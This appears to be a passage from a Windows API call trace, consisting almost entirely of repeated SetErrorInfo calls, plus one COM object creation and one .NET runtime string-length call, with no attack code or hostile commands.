[0061.963] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.963] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.963] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.964] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.964] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.964] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.964] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.964] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.964] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.964] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.964] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.964] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.964] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.964] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.964] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.964] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.964] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.964] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.964] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.964] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.964] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.964] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.964] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.964] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.964] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.964] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.964] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.964] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.965] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.965] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.965] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.965] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.965] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.965] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.965] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.965] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.965] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.965] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.965] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.965] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.965] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.965] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.966] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.966] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.966] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.966] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.966] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.966] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.966] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.966] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.966] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.966] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.966] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.966] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.966] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.966] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.966] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.967] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.967] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.967] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.967] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.967] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.967] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.967] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.967] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.967] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.967] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.967] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.967] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.967] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.967] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.967] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.967] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.967] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.967] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.967] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.967] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.967] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.967] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.967] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.967] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.967] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.967] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.967] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.967] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.968] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.968] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.968] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.968] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.968] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.968] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.968] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.968] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.968] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.968] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.968] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.968] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.968] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.970] CoCreateInstance (rclsid=0x538005a28*(Data1=0xb81ff171, Data2=0x20f3, Data3=0x11d2, Data4=([0]=0x8d, [1]=0xcc, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb0, [6]=0x5, [7]=0x25)), pUnkOuter=0x0, dwClsContext=0x15, riid=0x538005a38*(Data1=0xb81ff171, Data2=0x20f3, Data3=0x11d2, Data4=([0]=0x8d, [1]=0xcc, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb0, [6]=0x5, [7]=0x21)), ppv=0x12fd90)
[0061.984] SysStringLen (param_1="System.Runtime.Remoting.Metadata.SoapOption, mscorlib, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089") returned 0x78
[0061.985] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.985] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.985] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.986] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.986] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.986] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.987] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.989] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.989] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.989] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.989] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.989] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.990] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.990] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.990] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.990] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.990] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.990] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.990] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.990] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.990] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.990] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.990] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.990] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.990] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.990] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.990] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.990] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.990] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.990] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.990] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.990] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.990] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.990] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.990] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.990] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.991] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.991] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.991] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.991] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.991] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.991] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.991] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.991] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.991] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.991] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.991] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.991] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.991] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.991] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.991] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.991] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.991] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.991] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.991] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.992] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.992] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.992] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.992] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.992] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.992] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.992] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.992] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.992] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.992] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.992] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.992] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.992] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.992] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.992] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.992] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.992] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.992] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.992] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.992] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.992] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.992] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.992] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.992] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.992] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.992] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.993] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.993] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.993] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.993] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.993] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.993] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.993] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.993] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.993] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.993] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.993] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.993] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.993] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.993] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.993] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.994] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.994] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.994] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.994] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.994] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.994] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.994] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.994] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.994] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.994] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.994] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.994] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.994] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.994] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.994] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.994] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.994] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.994] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.994] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.994] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.995] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.995] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.995] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.995] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.995] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.995] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.995] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.995] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.995] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.995] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.995] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.995] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.995] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.995] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.995] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.995] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.995] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.995] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.995] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.995] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.996] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.996] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.996] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.996] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.996] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.996] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.996] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.996] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.996] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.996] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.996] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.996] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.996] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.996] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.996] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.996] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.997] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.997] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.997] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.997] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.997] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.997] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.997] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.997] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.997] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.997] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.997] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.997] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.997] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.997] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.997] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.997] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.997] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.997] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.997] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.997] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.998] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.998] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.998] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.998] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.998] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.998] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.998] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.998] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.998] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.998] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.998] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.998] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.998] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.998] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.998] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.998] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.998] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.998] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.999] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.999] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.999] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.999] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.999] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.999] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.999] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.999] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.999] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.000] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.000] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.000] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.000] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.000] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.000] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.000] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.000] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.000] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.000] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.000] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.000] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.001] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.001] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.001] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.001] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.001] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.001] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.001] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.001] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.001] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.001] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.001] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.001] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.001] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.001] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.001] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.001] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.001] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.001] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.001] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.001] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.001] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.001] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.002] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.002] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.002] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.002] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.002] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.002] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.002] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.002] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.002] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.002] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.002] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.002] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.002] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.002] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.002] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.002] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.002] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
